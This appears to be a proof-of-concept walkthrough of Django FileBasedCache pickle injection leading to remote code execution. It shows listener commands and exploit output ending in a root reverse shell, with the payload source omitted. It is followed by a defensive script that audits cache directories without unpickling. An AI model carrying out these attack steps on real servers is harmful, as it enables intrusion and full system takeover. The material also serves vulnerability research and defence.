Django FileBasedCache abuse via malicious Pickle injection into .djcache files for RCE.
1. Determine Cache Mechanism & Location: Ensure that filebased.FileBasedCache is defined in settings.py and the directory specified in the LOCATION setting is writable.

CACHES = {
    'default': {
        'BACKEND': 'django.core.cache.backends.filebased.FileBasedCache',
        'LOCATION': '/var/tmp/django_cache',
    }
}

2. Determine where the Caching Logic is Applied: The cache decorator (i.e., @cache_page) is generally applied in views.py. The view function may be subject to cache manipulation. Access this endpoint to generate .djcache files.

grep -Ri '@cache' webApp/

@cache_page(60)
def endpoint(request):
    [...]

3. Start Listener

penelope -p 9999

4. Execute PoC: Trigger the payload by accessing the vulnerable endpoint again.

foo@bar:~$ python3 djangoFBCacheRCE.py
Enter Django cache directory path: /var/tmp/django_cache
Using cache directory: /var/tmp/django_cache
Enter host IP address: x.x.x.x
Enter listening port: 9999
Payload written to 1f0acfe7480a469402f1852f8313db86.djcache.
Payload written to 90dbab8f3b1e54369abdeb4ba1efc106.djcache.

penelope -p 9999
[+] Listening for reverse shells on 0.0.0.0:9999 → 127.0.0.1 • 192.168.189.134 • 172.17.0.1 • 172.18.0.1 • 10.10.14.6
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from bar~x.x.x.x-Linux-x86_64 😍 Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /home/blkbrd/.penelope/bar~x.x.x.x-Linux-x86_64/2099_11_01-01_xx_xx-xx.log 📜
─────────────────────────────────────────────────────────────────────────────────────────────
root@bar:/var/www/webApp# id
uid=0(root) gid=0(root) groups=0(root)
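
A defender-side check for the precondition in step 1, as an added example (not part of the original PoC or of Django): it audits a FileBasedCache LOCATION for loose ownership or permissions and inspects the leading pickle of each .djcache file with pickletools, without unpickling anything. It assumes a POSIX host and Django's on-disk layout (a pickled expiry float or None, followed by the zlib-compressed pickled value); audit_cache_dir, header_opcodes and build_sample are hypothetical names, and the sample files are constructed.

```python
import os, pickle, pickletools, stat, tempfile, time, zlib
from pathlib import Path

# Opcodes that a pickled expiry value (a float, or None for "never expires")
# can contain. Anything else in the header is not what Django writes there.
HEADER_OPS = {"PROTO", "FRAME", "BINFLOAT", "FLOAT", "NONE", "STOP"}

def header_opcodes(data: bytes) -> set:
    """Opcode names of the first pickle in the data, read WITHOUT unpickling."""
    try:
        return {op.name for op, _arg, _pos in pickletools.genops(data)}
    except Exception:
        return {"<unparseable>"}

def audit_cache_dir(location, expected_uid=None):
    """Return (path, finding) tuples for a FileBasedCache LOCATION directory."""
    expected_uid = os.geteuid() if expected_uid is None else expected_uid
    root, findings = Path(location), []
    st = root.stat()
    if st.st_uid != expected_uid:
        findings.append((str(root), "directory not owned by the application user"))
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append((str(root), "directory writable by group or others"))
    for f in sorted(root.glob("*.djcache")):
        if f.stat().st_uid != expected_uid:
            findings.append((f.name, "file not owned by the application user"))
        extra = header_opcodes(f.read_bytes()) - HEADER_OPS
        if extra:
            findings.append((f.name, "unexpected opcodes in expiry header: "
                             + ",".join(sorted(extra))))
    return findings

def build_sample():
    """Constructed sample: one Django-layout entry, one with a non-float header."""
    d = Path(tempfile.mkdtemp())
    os.chmod(d, 0o777)  # deliberately loose, like a shared /var/tmp directory
    good = pickle.dumps(time.time() + 60) + zlib.compress(pickle.dumps("page body"))
    (d / "good.djcache").write_bytes(good)
    (d / "odd.djcache").write_bytes(pickle.dumps(len))  # header references a global
    return d

if __name__ == "__main__":
    for path, finding in audit_cache_dir(build_sample()):
        print(f"{path}: {finding}")
```

Run it as the account that serves the application, or pass that account's uid as expected_uid. A clean header does not vouch for the compressed value that follows it, so the ownership and permission findings are the ones to fix first.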